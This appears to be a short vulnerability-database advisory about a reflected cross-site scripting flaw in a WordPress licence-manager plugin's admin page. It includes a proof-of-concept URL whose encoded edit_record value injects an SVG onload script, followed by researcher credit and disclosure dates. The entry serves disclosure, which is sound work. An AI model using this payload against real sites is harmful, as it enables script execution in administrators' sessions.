The plugin does not sanitise or escape the edit_record parameter before outputting it back in the page in the admin dashboard, leading to a Reflected Cross-Site Scripting issue
https://example.com/wp-admin/admin.php?page=wp_lic_mgr_addedit&edit_record=a%22%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3B%3E%3C%22
iohex
iohex
Yes
2021-08-11 (about 10 months ago)
2021-08-11 (about 10 months ago)
2022-04-12 (about 2 months ago)